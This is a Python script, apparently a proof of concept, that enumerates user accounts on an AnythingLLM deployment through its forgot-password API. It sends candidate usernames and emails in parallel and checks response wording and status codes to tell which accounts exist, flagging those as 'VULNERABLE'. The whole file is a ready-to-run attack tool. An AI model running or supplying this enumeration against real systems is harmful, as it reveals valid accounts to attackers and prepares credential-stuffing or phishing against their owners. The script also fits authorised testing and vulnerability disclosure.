import requests
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
TARGET_URL = "http://target-anything-llm.com"
FORGOT_PASSWORD_ENDPOINT = f"{TARGET_URL}/api/forgot-password"
# Common test usernames/emails for enumeration
TEST_ACCOUNTS = [
"
[email protected]",
"
[email protected]",
"
[email protected]",
"admin",
"root",
"administrator"
]
def test_username(username):
"""
Test if a username exists by checking the password recovery response.
Returns True if username exists, False otherwise.
"""
try:
response = requests.post(
FORGOT_PASSWORD_ENDPOINT,
json={"email": username},
headers={
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
},
timeout=10
)
response_text = response.text.lower()
response_json = response.json() if response.headers.get('content-type', '').find('json') != -1 else {}
# Check for different error messages that indicate username existence
# If the response indicates success or password reset sent, user exists
success_patterns = [
"password reset",
"reset link",
"email sent",
"check your email",
"successfully"
]
# If the response indicates user not found, user does not exist
not_found_patterns = [
"not found",
"does not exist",
"no account",
"invalid email",
"user not found"
]
for pattern in success_patterns:
if pattern in response_text:
return (username, True, "User exists - password reset initiated")
for pattern in not_found_patterns:
if pattern in response_text:
return (username, False, "User does not exist")
# If response codes differ based on user existence
if response.status_code == 200 and response_json.get('success'):
return (username, True, "User exists")
elif response.status_code == 404:
return (username, False, "User not found")
return (username, None, f"Unknown response: {response.status_code}")
except Exception as e:
return (username, None, f"Error: {str(e)}")
def main():
print(f"[*] Testing password recovery endpoint: {FORGOT_PASSWORD_ENDPOINT}")
print(f"[*] Testing {len(TEST_ACCOUNTS)} usernames...\n")
existing_users = []
with ThreadPoolExecutor(max_workers=5) as executor:
futures = {executor.submit(test_username, user): user for user in TEST_ACCOUNTS}
for future in as_completed(futures):
username, exists, message = future.result()
if exists:
print(f"[+] VULNERABLE: {username} - {message}")
existing_users.append(username)
else:
print(f"[-] Not found: {username}")
print(f"\n[*] Found {len(existing_users)} existing users")
return existing_users
if __name__ == "__main__":
main()